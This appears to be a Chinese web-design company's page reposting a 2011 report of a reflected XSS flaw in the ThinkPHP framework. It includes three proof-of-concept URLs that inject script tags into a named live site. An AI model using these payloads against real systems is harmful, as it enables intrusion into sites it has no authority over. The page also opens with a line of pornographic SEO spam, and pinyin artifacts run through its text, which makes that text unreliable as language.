日韩av爽爽爽久久久久久,嫩草av久久伊人妇女超级a,久久精品a亚洲国产v高清不卡,久久成人国产精品一区二区

知識學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識學(xué)堂 > 網(wǎng)站建設(shè)知識
ThinkPHP開發(fā)框架xss
更新時間:2011-12-26 | 發(fā)布人:本站 | 點擊率:460
簡要描述:開源php開發(fā)框架默認(rèn)存在xss漏洞,導(dǎo)致所有使用該框架開發(fā)的系統(tǒng)都存在xss漏洞
 
詳細(xì)說明:對不不存在的模塊處理錯誤不當(dāng),導(dǎo)致xss漏洞
 
漏洞證明:
 
以超級巡警測試
 
 
 
http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login
 
http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&
 
http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&
 
 
 
去看看
 
修復(fù)方案:設(shè)置好過濾吧~~~
相關(guān)文章